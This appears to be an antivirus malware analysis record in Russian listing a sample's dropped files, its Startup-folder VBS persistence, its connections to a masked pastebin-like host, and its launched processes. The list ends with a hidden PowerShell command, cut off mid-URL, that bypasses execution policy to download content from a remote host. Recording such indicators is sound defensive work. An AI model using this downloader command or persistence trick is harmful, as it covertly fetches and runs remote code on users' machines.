Техническая информация
- %HOMEPATH%\Start Menu\Programs\Startup\Az3r.vbs
- %TEMP%\setup.exe
- %TEMP%\Az3r.vbs
- %TEMP%\nsy2.tmp
- %TEMP%\nst3.tmp\System.dll
- 'localhost':1037
- 'pa###bin.com':443
- DNS ASK pa###bin.com
- '<SYSTEM32>\wscript.exe' "%TEMP%\Az3r.vbs"
- '%TEMP%\setup.exe'
- '<SYSTEM32>\cmd.exe' /c powershell -ExecutionPolicy Bypass -windowstyle hidden -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://a....